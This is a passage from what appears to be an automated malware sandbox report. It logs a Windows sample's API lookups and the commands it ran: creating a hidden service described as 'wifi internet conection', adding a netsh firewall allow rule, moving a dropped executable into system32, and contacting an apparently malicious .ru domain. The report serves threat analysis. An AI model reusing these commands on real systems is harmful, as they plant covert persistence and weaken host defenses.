\"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalW (UID: 00000000-00001512)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter IsWow64Process (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter _alldiv (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetAdaptersInfo (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetIfEntry (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetBestInterface (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalA (UID: 00000000-00003044)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter DnsQuery_A (UID: 00000000-00003044)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002528)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CryptEnumProvidersW (UID: 00000000-00002528)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00002528)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00002528)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00002528)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00002528)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerW (UID: 00000000-00002528)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenServiceW (UID: 00000000-00002528)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceConfigW (UID: 00000000-00002528)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseServiceHandle (UID: 00000000-00002528)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceStatus (UID: 00000000-00002528)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00002528)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00002528)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00002528)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00002528)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00002528)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00002528)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00002528)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00002528)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00002528)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00002528)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00002528)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpInitialize (UID: 00000000-00002528)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegisterGPNotification (UID: 00000000-00002528)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter UnregisterGPNotification (UID: 00000000-00002528)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetHashInterface (UID: 00000000-00002528)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCipherInterface (UID: 00000000-00002528)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadUILanguage (UID: 00000000-00002528)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00002528)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpTerminate (UID: 00000000-00002528)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002528)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03ee46b@ADVAPI32.dll\"\n \"0e000f00703fe46b@ADVAPI32.dll\"\n \"0e000f00cc3fe46b@ADVAPI32.dll\"\n \"11001200b447e46b@ADVAPI32.dll\"\n \"110012004848e46b@ADVAPI32.dll\"\n \"120013008c48e46b@ADVAPI32.dll\"\n \"12001300e448e46b@ADVAPI32.dll\"\n \"14001500906ee46b@ADVAPI32.dll\"\n \"14001500a86ee46b@ADVAPI32.dll\"\n \"14001500c06ee46b@ADVAPI32.dll\"\n \"17001800d86ee46b@ADVAPI32.dll\"\n \"0d000e00f06ee46b@ADVAPI32.dll\"\n \"11001200006fe46b@ADVAPI32.dll\"\n \"11001200146fe46b@ADVAPI32.dll\"\n \"0d000e003449e46b@SHELL32.dll\"\n \"0d000e00b049e46b@SHELL32.dll\"\n \"0f0010005470e46b@ADVAPI32.dll\"\n \"140015009470e46b@ADVAPI32.dll\"\n \"14001500ac70e46b@ADVAPI32.dll\"\n \"0c000d00f470e46b@ADVAPI32.dll\"\n \"0c000d000471e46b@ADVAPI32.dll\"\n \"0e000f001471e46b@ADVAPI32.dll\"\n \"0e000f002471e46b@ADVAPI32.dll\"\n \"0b000c003471e46b@ADVAPI32.dll\"\n \"140015006872e46b@SETUPAPI.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005548)\n \"cmd.exe\" called \"CreateDirectoryW\" with parameter %WINDIR%\\system32\\aweovprv\\ (UID: 00000000-00005904)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C mkdir %WINDIR%\\system32\\aweovprv\\\" - (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C move /Y \"%TEMP%\\ctbzjelz.exe\" %WINDIR%\\system32\\aweovprv\\\" - (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" create aweovprv binPath= \"%WINDIR%\\system32\\aweovprv\\ctbzjelz.exe /d\\\"C:\\d510af41349a55e3d3c3233acb\" - (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" description aweovprv \"wifi internet conection\"\" - (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" start aweovprv\" - (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\netsh.exe\" advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow prog\" - (UID: 00000000-00005548)\n \"ctbzjelz.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00001512)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-275", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a named pipe", "description": "\"svchost.exe\" called \"CreateNamedPipeA\" with parameter \"\\\\.\\pipe\\uqyipjlp\"\n dwOpenMode: \"1073741827\"\n dwPipeMode: \"0\" - (UID: 00000000-00003044)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-302", "type": 9, "relevance": 3, "name": "Tries to move files", "description": "Process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\ctbzjelz.exe\" %WINDIR%\\\\system32\\\\aweovprv\\\\\" (UID: 00000000-00001588)", "origin": "Monitored Target", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:80\"\n \"<IPv4>:25\"\n \"<IPv4>:443\"\n \"<IPv4>:443\"\n \"<IPv4>:25\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"lazystax.ru\"\n \"microsoft-com.mail.protection.outlook.com\"\n \"microsoft.com\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2\" has an executable section named \".text\"\n \"ctbzjelz.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2\" has an writable section named \".data\"\n 